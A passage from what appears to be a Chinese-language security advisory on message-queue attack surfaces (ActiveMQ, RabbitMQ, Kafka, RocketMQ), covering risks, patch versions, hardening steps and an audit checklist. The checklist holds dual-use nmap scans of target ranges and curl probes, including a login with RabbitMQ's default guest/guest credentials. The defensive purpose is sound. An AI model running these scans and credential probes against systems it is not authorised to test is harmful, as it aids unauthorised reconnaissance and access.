  2. 消息篡改注入:攻击者可以向业务队列注入恶意消息,触发下游系统的异常行为
  3. 凭据扩散:消息队列通常存储或转发大量系统间通信的凭据和 Token
  4. 横向渗透跳板:消息队列连接着企业内网的多个系统,是天然的横向移动通道
  5. 供应链污染:通过篡改消息内容,可以间接影响所有消费该消息的下游系统

0x09 防守建议

9.1 紧急措施

  1. 立即升级
    • Apache ActiveMQ → 5.18.3+ / 5.17.6+ / 5.16.7+ / 5.15.16+
    • Apache RocketMQ → 5.1.1+
  2. 网络隔离:所有消息队列管理端口禁止直接暴露到互联网
  3. 修改默认凭据:RabbitMQ 立即修改 guest/guest,禁用或限制 guest 账号
  4. JMX 加固:Kafka JMX 端口启用认证,配置 com.sun.management.jmxremote.authenticate=true

9.2 排查清单

# 1. 扫描暴露在互联网上的消息队列端口
nmap -sV -p 61616,8161,15672,5672,9999,9876,9092,10911 <target_range>

# 2. 检查 ActiveMQ 版本
curl -s http://target:8161/api/jolokia/version | jq .value.version

# 3. 检查 RabbitMQ 默认凭据
curl -s -u guest:guest http://target:15672/api/overview

# 4. 检查 Kafka JMX 认证
echo "env | grep JMX"  # 在 Kafka 服务器上检查 JMX 配置

# 5. 检查 RocketMQ 版本
curl -s http://target:10911/api/getAllTopicConfig

# 6. 检查 Kafka ACL 配置
kafka-acls.sh --bootstrap-server target:9092 --list

# 7. 检查消息队列进程连接
ss -tlnp | grep -E '61616|15672|9999|9876|9092'

9.3 中期加固

  1. 启用认证:所有消息队列启用强认证机制(SASL/SCRAM、mTLS)
  2. 最小权限:为每个应用分配独立的账号和 ACL 规则,禁止共享凭据
  3. 传输加密:启用 TLS 加密消息传输,防止中间人窃听和篡改
  4. 审计日志:开启消息队列的审计日志,记录所有连接和管理操作
  5. 监控告警:部署针对消息队列的异常行为监控,包括异常连接、大量消息消费、配置变更等
  6. 定期轮换:定期轮换消息队列的认证凭据和 SSL 证书

0x0A 参考资料